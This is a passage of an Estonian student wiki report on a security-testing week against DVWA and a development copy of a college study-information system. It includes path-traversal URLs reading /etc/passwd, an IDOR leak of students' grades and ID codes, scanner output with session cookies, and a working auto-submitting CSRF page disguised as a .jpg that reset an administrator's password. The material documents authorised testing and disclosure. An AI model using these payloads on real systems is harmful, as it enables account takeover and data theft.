  .tif	.tiff	.exif&lt;br /&gt;
  .raw	.cgm&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks tuleb kasutada &amp;quot;?page=&amp;quot; ja faili asukoht:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg&lt;br /&gt;
Kuvatakse php skripti tulemus.&lt;br /&gt;
  Kommentaar: &amp;quot;?page=&amp;quot; kasutamine võetud menüüvalikust: &amp;lt;b&amp;gt;File Inclusion&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;quot;?page=&amp;quot; abil saab vaadata kasutajate nimesid:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd&lt;br /&gt;
&amp;lt;li&amp;gt;Paroole vaadata ei saa, selleks õigused puuduvad:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: kõrge tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: High -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks ei piisa ka &amp;quot;?page=&amp;quot; kasutamisest. Igal juhul on vastus selline:&amp;lt;/li&amp;gt;&lt;br /&gt;
  ERROR: File not found!&lt;br /&gt;
&amp;lt;li&amp;gt;Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://www.motobit.com/util/base64-decoder-encoder.asp&lt;br /&gt;
&amp;lt;li&amp;gt;Moodustades loodud faili asukohast kood ja kasutades&amp;lt;/li&amp;gt;&lt;br /&gt;
  data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==&lt;br /&gt;
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 3. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]&lt;br /&gt;
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.&amp;lt;br&amp;gt;&lt;br /&gt;
Faile saab alla laadida enda profiili all õppesooritustes.&amp;lt;br&amp;gt;&lt;br /&gt;
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.&amp;lt;br&amp;gt;&lt;br /&gt;
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
====Subgraph Vega ====&lt;br /&gt;
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.&lt;br /&gt;
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.&lt;br /&gt;
Programm on Java põhine graafilise liidesega ja töötab Linux&#039;i, OS X ja Windowsi peal.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]&lt;br /&gt;
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.&lt;br /&gt;
&lt;br /&gt;
Alustasime uut skänni (Start New Scan).&lt;br /&gt;
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.&lt;br /&gt;
&lt;br /&gt;
Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised. &lt;br /&gt;
&lt;br /&gt;
Me lisasime ainult küpsise (cookie) sisu: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
ning Finish.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]&lt;br /&gt;
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).&lt;br /&gt;
&lt;br /&gt;
Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000. &lt;br /&gt;
&lt;br /&gt;
Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script&#039;ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body  nõrkust.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID&#039;sid ja parameetreid ära oma pealkirjades.&lt;br /&gt;
Õnneks parameetritega väljad olid veebilehel korralikult ära escape&#039;itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.&lt;br /&gt;
&lt;br /&gt;
ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.&lt;br /&gt;
&lt;br /&gt;
==== Wapiti ====&lt;br /&gt;
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti. &lt;br /&gt;
(Koduleht: http://wapiti.sourceforge.net/)&lt;br /&gt;
&lt;br /&gt;
Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS&#039;iga midagi teha.&lt;br /&gt;
&lt;br /&gt;
==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====&lt;br /&gt;
=====1. katse - ÕISi keskkkonna keelevahetus =====&lt;br /&gt;
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]&lt;br /&gt;
&lt;br /&gt;
Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.&lt;br /&gt;
&lt;br /&gt;
Võtsime dev-ÕIS&#039;i Source Code&#039;ist välja vastava formi osa ja panime eraldi html faili.&lt;br /&gt;
Koristasime mittevajaliku disaini koodi juurest ära.&lt;br /&gt;
Muutsime form&#039;i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.&lt;br /&gt;
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks &amp;quot;en&amp;quot; ehk inglise keelne keskkond tekiks.&lt;br /&gt;
Panime koodi enose veebiserverisse üles nimega ois.html.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;form id=&amp;quot;settingsForm&amp;quot; method=&amp;quot;post&amp;quot; action=&amp;quot;https://itcollege.dev.ois.ee/setting/edit?user_id=2198&amp;quot; &lt;br /&gt;
enctype=&amp;quot;application/x-www-form-urlencoded&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;input type=&amp;quot;hidden&amp;quot; AUTOCOMPLETE=&amp;quot;off&amp;quot; name=&amp;quot;default_language&amp;quot;value=&amp;quot;en&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;br&amp;gt;&lt;br /&gt;
  &amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;Salvesta seaded&amp;quot; name=&amp;quot;Savesettings&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;/form&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.&lt;br /&gt;
&lt;br /&gt;
Katsetas koodi enda konto peal Taavi.&lt;br /&gt;
&lt;br /&gt;
=====2. katse - ÕIS&#039;i kasutaja parooli muutmine =====&lt;br /&gt;
&lt;br /&gt;
[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]&lt;br /&gt;
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.&lt;br /&gt;
&lt;br /&gt;
Selle jaoks uurisime välja, kus asub dev-ÕIS&#039;i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.&lt;br /&gt;
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.&lt;br /&gt;
&lt;br /&gt;
Muutsime password ja password_check lahtrite väärtused järgnevaks: &amp;quot;test123&amp;quot; ehk kasutaja uus parool peale rünnakut.&lt;br /&gt;
&lt;br /&gt;
Lahtrites muutsime user_id&#039;d sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.&lt;br /&gt;
&lt;br /&gt;
Kõik vormi lahtrite tüübid määrasime peidetud ehk &amp;quot;hidden&amp;quot;, et poleks midagi näidata. &lt;br /&gt;
&lt;br /&gt;
Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist. &lt;br /&gt;
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.&lt;br /&gt;
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.&lt;br /&gt;
&lt;br /&gt;
Lisasime CSS koodi Submit nupu ära peitmiseks. &lt;br /&gt;
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Salvestasime faili ära kui &amp;quot;screen1.jpg&amp;quot; fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.&lt;br /&gt;
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
 &amp;lt;head&amp;gt;&lt;br /&gt;
  &amp;lt;style type=&amp;quot;text/css&amp;quot;&amp;gt;&lt;br /&gt;
	  #Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }&lt;br /&gt;
  &amp;lt;/style&amp;gt;&lt;br /&gt;
 &amp;lt;/head&amp;gt;&lt;br /&gt;
 &amp;lt;body&amp;gt;&lt;br /&gt;
  &amp;lt;body onload=&amp;quot;document.forms.setPasswordForm.submit();&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;form name=&amp;quot;setPasswordForm&amp;quot; id=&amp;quot;setPasswordForm&amp;quot; &lt;br /&gt;
  action=&amp;quot;https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&amp;amp;amp;continue=/auth/logout&amp;quot;  &lt;br /&gt;
  method=&amp;quot;post&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;user_id&amp;quot; value=&amp;quot;2227&amp;quot; id=&amp;quot;user_id&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;continue&amp;quot; value=&amp;quot;%2Fet%2Fsetting%3Fuser_id%3D2227&amp;quot; id=&amp;quot;continue&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password&amp;quot; id=&amp;quot;password&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password_check&amp;quot; id=&amp;quot;password_check&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;submit&amp;quot; name=&amp;quot;Setpassword&amp;quot; id=&amp;quot;Setpassword&amp;quot; value=&amp;quot;Muuda salasõna&amp;quot; /&amp;gt;&lt;br /&gt;
  &amp;lt;/form&amp;gt;&lt;br /&gt;
 &amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]&lt;br /&gt;
&lt;br /&gt;
Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
AddType application/x-httpd-php .php .jpg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Laadisime mõlemad failid Enose veebiserverisse avalikult. &lt;br /&gt;
&lt;br /&gt;
Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki. &lt;br /&gt;
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.&lt;br /&gt;
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle. &lt;br /&gt;
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.&lt;br /&gt;
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail. &lt;br /&gt;
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja. &lt;br /&gt;
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud &amp;quot;test123&amp;quot;-ks ja me saime ligipääsu administraatori õigustes kontole. &lt;br /&gt;
Rünnak oli edukas.&lt;br /&gt;
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]&lt;br /&gt;
&lt;br /&gt;
Andsime teada Valterile teada, et tegelikult tegime salajase ründe. &lt;br /&gt;
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha. &lt;br /&gt;
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug&#039;iga.&lt;br /&gt;
&lt;br /&gt;
Kuna tegu oli ÕIS&#039;i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.&lt;br /&gt;
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
===Burp suite===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Esimese asjane peale Burp suite käivitamist. Tabilt proxy  -&amp;gt;intercept -&amp;gt;intercept off&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)&amp;lt;br&amp;gt;&lt;br /&gt;
Proxy  -&amp;gt; options alt lülitada sisse proxy listner pordile 8080 .&amp;lt;br&amp;gt;&lt;br /&gt;
Ohvri valimine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida intruder -&amp;gt; target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.&amp;lt;br&amp;gt;&lt;br /&gt;
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.&amp;lt;br&amp;gt;site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.&lt;br /&gt;
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.&amp;lt;br&amp;gt;&lt;br /&gt;
Targer-&amp;gt;scope -&amp;gt; exclude  frome scope ja veenduda at välja on arvatud logout laused.&amp;lt;br&amp;gt;&lt;br /&gt;
Spideringi sisselülitamine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida tab Spide ning sealt panna linnuke kasti spider running.&amp;lt;br&amp;gt;&lt;br /&gt;
Ning oledki valmis saama laheküljelt infot.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.&lt;br /&gt;
&lt;br /&gt;
==Nessuse algkäivitamine==&lt;br /&gt;
Valida backtrackist  vulnerability scannerite alt nessus ning edasi nessus register .&amp;lt;br&amp;gt; Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.&amp;lt;br&amp;gt; Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)&amp;lt;br&amp;gt;&lt;br /&gt;
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt valida nessus start.&amp;lt;br&amp;gt;&lt;br /&gt;
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834 &lt;br /&gt;
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.&amp;lt;br&amp;gt;&lt;br /&gt;
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==Väike upload tegevus, mis võiks olla teisiti==&lt;br /&gt;
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.&lt;br /&gt;
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.&lt;br /&gt;
Proovisime üles laadida filme, .exe jne faile - kõik läks läbi.&lt;br /&gt;
Sellises kohas võiks olla süsteem tehtud whitelisti põhimõttel, et lubatud oleks ainult .doc .docx .pdf taolised failid ja kõik ülejäänud keelatud.&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]&lt;br /&gt;
Backtarcki keskkonnas sai testitud programmi w3af.&lt;br /&gt;
&lt;br /&gt;
==== Backtrack: w3af ====&lt;br /&gt;
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]&lt;br /&gt;
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]&lt;br /&gt;
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]&lt;br /&gt;
Võimalik kätte saada SSL Certificate.&lt;br /&gt;
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:&lt;br /&gt;
  https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?&lt;br /&gt;
  username=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&amp;amp;continue=&amp;amp;Login=Logi sisse&amp;amp;pw=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
Programmi sisestatud andmetega ka mitte:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Basic HTTP Authentication:&lt;br /&gt;
    basicAuthUser: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthPass: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthDomain: http://itcollege.dev.ois.ee&lt;br /&gt;
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Cookies&lt;br /&gt;
    cookieJarFile: /root/Desktop/&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;ois_cookie.txt&amp;lt;/font&amp;gt;&lt;br /&gt;
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:&lt;br /&gt;
  # Netscape HTTP Cookie File&lt;br /&gt;
  .dev.ois.ee	TRUE	/	FALSE	1731510001	itcollege_OIS_SESSION_ID	&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;870aqllryuw3cmf6cv8ellha03&amp;lt;/font&amp;gt;&lt;br /&gt;
Esimene rida on nõutav! Teiste tähendused:&lt;br /&gt;
  domain - The domain that created and that can read the variable.&lt;br /&gt;
  flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.&lt;br /&gt;
    This value is set automatically by the browser, depending on the value you set for domain.&lt;br /&gt;
  path - The path within the domain that the variable is valid for.&lt;br /&gt;
  secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.&lt;br /&gt;
  expiration - The UNIX time that the variable will expire on.&lt;br /&gt;
  name - The name of the variable.&lt;br /&gt;
  value - The value of the variable.&lt;br /&gt;
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:&lt;br /&gt;
  Edit -&amp;gt; Preferences -&amp;gt; Privacy -&amp;gt; History -&amp;gt; remove individual cookies&lt;br /&gt;
    Search: itcollege.dev.ois.ee&lt;br /&gt;
    Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Skänneerimine:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The page language is: en&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; has a &amp;quot;&amp;lt;form&amp;gt;&amp;quot; element with auto-complete enabled.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;A comment with the string &amp;quot;&amp;lt;p&amp;amp;gt;tunne end kui koolis&amp;lt;/p&amp;amp;gt;&amp;quot; was found in: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Found a form login. The action of the form is: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  The username field to be used is: &amp;quot;username&amp;quot;.&lt;br /&gt;
  The password field to be used is: &amp;quot;pw&amp;quot;.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;Found authentication credentials to: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;. A correct user and password combination is: Administrador/6666666&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  Antud kasutaja ja parooliga sisse ei saanud.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; returned a response that may contain a &amp;quot;SHA1&amp;quot; hash. The hash is: &amp;quot;c7b39896de5f296b5a44c2dfcd9f0600b2cf424d&amp;quot;. This is uncommon and requires human verification.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; sent these cookies:&amp;lt;/li&amp;gt;&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/&lt;br /&gt;
&amp;lt;li&amp;gt;The SMTP settings in emailReport plugin seem to be incorrect. Original error: &amp;quot;[Errno 111] Connection refused&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Kui tuleb see veateade, siis skänn katkeb.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;SQL injection in a Unknown database was found at: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;, using HTTP method POST.&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The sent post-data was: &amp;quot;username=John8212&amp;amp;security_key_sis_global=d&#039;z&amp;quot;0&amp;amp;Login=Logi%20sisse&amp;amp;continue=56&amp;amp;pw=FrAmE30.&amp;quot;.&lt;br /&gt;
    The modified parameter was &amp;quot;security_key_sis_global&amp;quot;. This vulnerability was found in the request with id 390.&lt;br /&gt;
&amp;lt;li&amp;gt;Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt&amp;lt;/li&amp;gt;&lt;br /&gt;
  User-agent: *&lt;br /&gt;
  Disallow: /&lt;br /&gt;
  Allow: /curriculum&lt;br /&gt;
  Allow: /subject&lt;br /&gt;
  Allow: /diploma&lt;br /&gt;
  Allow: /schedule/ical&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 4. päev - Presentatsiooni tegemine ja esitlemine ==&lt;br /&gt;
&lt;br /&gt;
Koostasime presentatsiooni ja esitlemine.&lt;br /&gt;
&lt;br /&gt;
[[Media:Security_team_presentation.ppt]]&lt;br /&gt;
&lt;br /&gt;
== Arvamused intensiivõppe nädala kohta ==&lt;br /&gt;
&lt;br /&gt;
== Tegijad ==&lt;br /&gt;
Alo Konno A21&lt;br /&gt;
&lt;br /&gt;
Urmo Lihten A21&lt;br /&gt;
&lt;br /&gt;
Taavi Podžuks A22&lt;br /&gt;
&lt;br /&gt;
Matis Alliksoo A22&lt;br /&gt;
